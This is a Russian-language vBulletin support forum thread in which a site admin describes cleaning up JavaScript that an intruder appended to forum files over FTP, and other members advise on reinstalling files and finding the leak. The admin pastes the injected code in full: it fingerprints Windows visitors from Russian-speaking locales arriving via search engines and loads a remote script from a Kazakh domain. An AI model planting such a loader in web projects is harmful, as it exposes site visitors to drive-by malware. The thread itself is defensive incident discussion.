форум vBSupport.ru > vBulletin > vBulletin 3.8.x > Вопросы по vBulletin 3.8
Register Меню vBsupport Изображения Files Manager О рекламе Today's Posts Search
  • Родная гавань
  • Блок РКН снят
  • Premoderation
  • For English speaking users
  • Каталог Фрилансеров
  • If you want to buy some product or script
  • Администраторам
VBsupport перешел с домена .ORG на родной .RU Ура! Пожалуйста, обновите свои закладки - VBsupport.ru
Блок РКН снят, форум доступен на всей территории России, включая новые терртории, без VPN
На форуме введена премодерация ВСЕХ новых пользователей

Почта с временных сервисов, типа mailinator.com, gawab.com и/или прочих, которые предоставляют временный почтовый ящик без регистрации и/или почтовый ящик для рассылки спама, отслеживается и блокируется, а так же заносится в спам-блок форума, аккаунты удаляются
for English speaking users:
You may be surprised with restriction of access to the attachments of the forum. The reason is the recent change in vbsupport.org strategy:

- users with reputation < 10 belong to "simple_users" users' group
- if your reputation > 10 then administrator (kerk, Luvilla) can decide to move you into an "improved" group, but only manually

Main idea is to increase motivation of community members to share their ideas and willingness to support to each other. You may write an article for the subject where you are good enough, you may answer questions, you may share vbulletin.com/org content with vbsupport.org users, receiving "thanks" equal your reputation points. We should not only consume, we should produce something.

- you may:
* increase your reputation (doing something useful for another members of community) and being improved
* purchase temporary access to the improved category:
10 $ for 3 months. - this group can download attachments, reputation/posts do not matter.
20 $ for 3 months. - this group can download attachments, reputation/posts do not matter + adds eliminated + Inbox capacity increased + files manager increased permissions.

Please contact kerk or Luvilla regarding payments.

Important!:
- if your reputation will become less then 0, you will be moved into "simple_users" users' group automatically.*
*for temporary groups (pre-paid for 3 months) reputation/posts do not matter.
Уважаемые пользователи!

На форуме открыт новый раздел "Каталог фрилансеров"

и отдельный раздел для платных заказов "Куплю/Закажу"

Если вы хотите приобрести какой то скрипт/продукт/хак из каталогов перечисленных ниже:
Каталог модулей/хаков
Ещё раз обращаем Ваше внимание: всё, что Вы скачиваете и устанавливаете на свой форум, Вы устанавливаете исключительно на свой страх и риск.
Сообщество vBSupport'а физически не в состоянии проверять все стили, хаки и нули, выкладываемые пользователями.
Помните: безопасность Вашего проекта - Ваша забота.
Убедительная просьба: при обнаружении уязвимостей или сомнительных кодов обязательно отписывайтесь в теме хака/стиля
Спасибо за понимание
 
 
 
 
Unlock
Продвинутый
Default Не получается удалить сообщения
0

Коллеги, я в тупике.
При попытке удалять сообщения пользователей вылезает окно
Вы ввели неправильное имя или пароль. бла, бла, бла
Хотя я залогинен. Сбрасывал куки и кеш броузера, но все равно такая вот байда. Одно важное пояснение. Вчера по фтп дописали js код в некоторые файлы, с проблемой вроде справился, но может какой-то важный файл обновил из инсталяционного пакета и так делать нельзя и поэтому вылезает проблема?
Bot
Yandex Bot Yandex Bot is online now
 
Join Date: 05.05.2005
Реклама на форуме А что у нас тут интересного? =)
 
 
kerk
k0t
 
kerk's Avatar
Default
1

нет, такого быть не должно из-за яваскрипта
попробуйте удалить все яваскрипты (ну естессно смотреть и файлы отпродуктов)
и залить новые
+ перезалить все файлы php из дистрибутива вашей версии
опять же если файлы не редактировались
 
 
Unlock
Продвинутый
Default
0

Файлы все перезалил, тут все чисто. Такое ощущение, что с куками проблема. Удалил в броузере куки и кеш, вроде сейчас удалось удалить сообщения, не выскочило этой проблемы.
Кстати, если можно, то еще вопрос. После внедрения кода который идет ниже, достаточно ли чтобы пользователи сменили пароли? После того, как вычистил всё, сделал рассылку пользователям, там немного людей могло быть задето, все должны сменить. Или надо еще что-то сделать?
Код:
Code:
var search = Name + "=";     var returnvalue = "";     if (document.cookie.length > 0) {          offset = document.cookie.indexOf(search);          if (offset != -1) {                offset += search.length;               end = document.cookie.indexOf(";", offset);               if (end == -1)               end = document.cookie.length;               returnvalue=unescape(document.cookie.substring(offset, end));          }     }     return returnvalue;
    }
    
    function set_cookie(name, value) {
var cxdate = new Date();    cxdate.setYear(2024);    cxdate.setMonth(3);    cxdate.setDate(3);    document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';}        
var br_reg = /(Firefox|MSIE|Opera)/i;
var usr_os = navigator.userAgent;

var ref_reg = /(yandex|google|mail|rambler|vk.com)/i;
var ref = document.referrer;
if (ref==null) ref='';
var lang = (navigator.language ||
            navigator.systemLanguage ||
            navigator.userLanguage ||
           'en').substr(0, 2).toLowerCase();

var useragent_reg = /(bot|yandex|yx)/i
var useragent = navigator.userAgent;


if(get_cookie('viewpages') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg) && ref.match(ref_reg) &&
 (lang=="ru" || lang=="ua" || lang=="by" || lang=="kz") && (!useragent.match(useragent_reg)) ) 
{
    var script = document.createElement('script');
    script.src = 'http://grandsteel.kz/stats.php';
    document.head.appendChild(script);
    set_cookie('viewpages', '8ihdf8hiio9000yud9');
};
 
 
Luvilla
Гость
Default

так...
стрелять говнораскрутчиков....

пиши хозяину сайта, чей домен впёрли в скрипте
примерный текст:

заказывали раскрутку проекта?
довожу до вашего сведения, что раскрутка проводится хакеркими методами, путём взлома чужих проектов и добавления вредоносного кода
что является уголовно наказуемым действием как на территории РФ, так и Казахстана
хотите пойти соучастником?

и требуй компенсации за нервотрёпку и беспокойство для юзеров
с учётом медицинской тематики твоего форума, тексту можно написать - мало не покажется
грози писать хостеру, регистратору домена и в правоохранительные органы

а, да, и обязательно пригрози пожаловаться в Гугл и Яндекс, что их выкинут вообще из выдачи, за такие методы
 
 
Unlock
Продвинутый
Default
0

Знаешь, я вот не уверен, что ситуация именно так обстоит. Ведь что там php файл делает, не известно. Может их самих ломанули и подсунули скрипт, которые еще дальше данные отправляет. Смущает вот что, я им написал, что типа вас взломали, проверьте файл и попросил этот скрип прислать. В ответ молчок. Может и правда они причем... Попробую еще раз написать.

Unlock добавил 29.01.2013 в 14:16
Кстати топорная работа. Вобла сразу затупила от вставки по все js левого кода. Если бы я еще не затупил и не хостеру писал вопросы, меняли ли они что-то на сервере и проверил файлы... Поставлю на днях файл инспектор, должен помочь в обнаружении подобной хрени.

Last edited by Unlock : 01-29-2013 at 04:16 PM. Reason: Добавлено сообщение
 
 
kerk
k0t
 
kerk's Avatar
Default
0

но ведь как то же пробрались на сервак?
ок, сиюминутную проблему решили, но нужно искать дырку на сервере и/или в хаках для воблы
вполне возможно, что троянец на компе одного из админов и/или тех, кто имеет доступ к серверу
 
 
Unlock
Продвинутый
Default
0

Quote:
Originally Posted by kerk View Post
но ведь как то же пробрались на сервак?
Руками или думаю скриптом, заход по ФТП и вставка js кода в конец файлов. Вход был под логином данные по которому были у троих человек, кроме меня. Один из них мой знакомый, второго практически не знаю, третьи - суппорт CMS. От них и утек, если исходить из того, что у меня вирей нет. Я знаю что лох. Надо было сменить пароль, после того, как люди выполнили свою работу. Так же как и ftpaccess вернуть, но затупил. :(

Quote:
Originally Posted by kerk View Post
троянец на компе одного из админов и/или тех, кто имеет доступ к серверу
Не с моего IP был вход по ФТП. С сервака mchost.

Хаки новые давно уже не ставил, так что дыра в вобле, это маловероятно. Вычистил вчера все, до сего момента повторного заражения не произошло.
 


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off




All times are GMT +4. The time now is 06:16 PM.


Powered by vBulletin® Version zEdition
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.